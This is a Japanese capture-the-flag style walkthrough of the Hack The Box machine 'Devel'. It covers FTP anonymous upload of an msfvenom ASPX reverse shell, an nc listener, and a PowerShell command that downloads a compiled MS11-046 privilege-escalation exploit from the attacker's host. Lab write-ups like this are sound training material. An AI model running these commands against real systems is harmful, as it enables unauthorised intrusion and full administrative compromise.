Develはwindowsのマシンで、難易度はeasyです。
流れとしては、以下のようになっています。
1.nmapのスクリプトエンジンで、FTPの匿名ログインが有効であることを確認
2.msfvnomでペイロードを作成
3.FTPで作成したペイロードをアップロード
4.アップロードしたファイルにアクセスして、リバースシェルを成功させる
5.systeminfoコマンドでos情報を取得し、os情報から脆弱性を検索
6.特権エスカーレーションのexploitを検索してコンパイル
7.powershellを利用して、exploitをダウンロード
8.exploitを実行して、管理者権限を取得
目次
1.Enumeration
nmpaでオープンポートが、21,80であることを確認
nmap -p- --min-rate=1000 -T4 -o ports -Pn 10.10.10.5
nmapのデフォルトスクリプトエンジンを実行(-sC オプション)
FTPでanonymousログインが有効であることが分かります。
nmap -Pn -sV -sC -p21,80 -o nmap 10.10.10.5
適当なhtmlファイルを作成して、FTPでアップロードできるか確認します。
アップロードは成功し、アップロードしたファイルにアクセスもできました。
2.Exploitation
リバースシェルのペイロードを作成します。
sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f aspx -o devel.aspx
FTPで作成したペイロードをアップロードします。
ncコマンドでリバースシェルを待ち受けます。
nc -nlvp 1234
アップロードしたファイルにアクセスします。
リバースシェルが成功します。
babis(user),Administratorのディレクトリに移動しようとしますが、「Access is denied」で入れません。
特権エスカレーションが必要みたいです。
3.Privilege Escalation
systeminfoコマンドでサーバの情報を確認します。OSのバージョンが古く、パッチも当ててないみたいなので、特権エスカーションの脆弱性がないか確認します。
googleにて「windows 7 build 7600 privilege escalation」のワードで調べると、「MS11-046」の脆弱性がありそうでした。
searchsploitで「MS11-046」のexploitがないか確認します。
40564.cのexploitを使うために、カレントディレクトリにコピーします。
コンパイルの仕方は、40564.cの中に記載されています。
mingw-w64がインストールされていない場合は、インストールします。(私はインストールされてなかった)
sudo apt-get install -y mingw-w64コンパイルをします。
i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32攻撃対象のサーバにダウロードさせるために、httpサーバをたてます。
python -m SimpleHTTPServer 8000
powershellのコマンドでダウンロードさせます。
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.2:8000/MS11-046.exe'、'c:\Users\Public\Downloads\MS11-046.exe')"
ダウンロードしたファイルを実行します。
管理者権限になったことを確認できました。